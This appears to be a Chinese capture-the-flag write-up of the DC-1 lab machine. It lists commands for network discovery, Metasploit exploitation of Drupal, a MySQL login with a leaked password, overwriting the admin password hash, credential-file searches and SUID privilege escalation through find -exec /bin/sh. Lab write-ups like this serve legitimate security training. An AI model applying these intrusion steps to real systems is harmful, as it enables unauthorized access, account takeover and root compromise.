DC-1靶机详解

首先打开设置都切换成NAT模式

然后改为root权限

使用 arp-scan 进行内网探测主机  arp-scan -l

其中我的192.168.124.131为靶机IP

测网段内所有主机是否开启端口   nmap -sV -p 22,23,3306,80 192.168.124.131/24

进入浏览器搜索 发现Drupal 框架,然后用 msf 工具进行攻击:msfconsole

寻找相关模块  search drupal   优先使用Rank高的模块 这里是使用1

设置相关参数 set RHOST 192.168.124.131(靶机地址)

拿到第一个flag 用cat命令打印出flag1内容 然后根据提示去找配置文件  配置/查看后出现flag2

发现连接数据库的用户名和口令 数据库为mysql

到数据库登录用的用户名和口令

python -c "import pty;pty.spawn( '/bin/bash')"

然后登录:mysql –u dbuser –p  密码: R0ck3t

登录成功查看相关信息:show databases;use drupaldb; select * from users发现用户名及密码hash

更改admin登录口令查看所有带有pass的文件:find / -name "*pass*"查看文件:cat /var/www/scripts/password-hash.sh设置密码为:php scripts/password-hash.sh 123456

更新数据库admin口令

update users set pass="$S$D38o/6Z0AKdbU2T3EM0qOaiGN8UyKK6V/5oXQETlRf4ZfLgaf8UV" where uid=1;

然后就可以去浏览器登录  admin//123456  点击Dashboard后发现flag3

输入命令:cat /etc/passwd, 发现flag4

查找flag文件,输入命令:find / -name "*flag*"

查找具有root权限的SUID的文件,输入命令:find / -perm -u=s -type f 2>/dev/nul

find / -name 775 -exec "/bin/sh" \;用-exec去替换权限

将find的root权限换成自己的:touch 775find / -name 775 -exec "whoami" \;

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值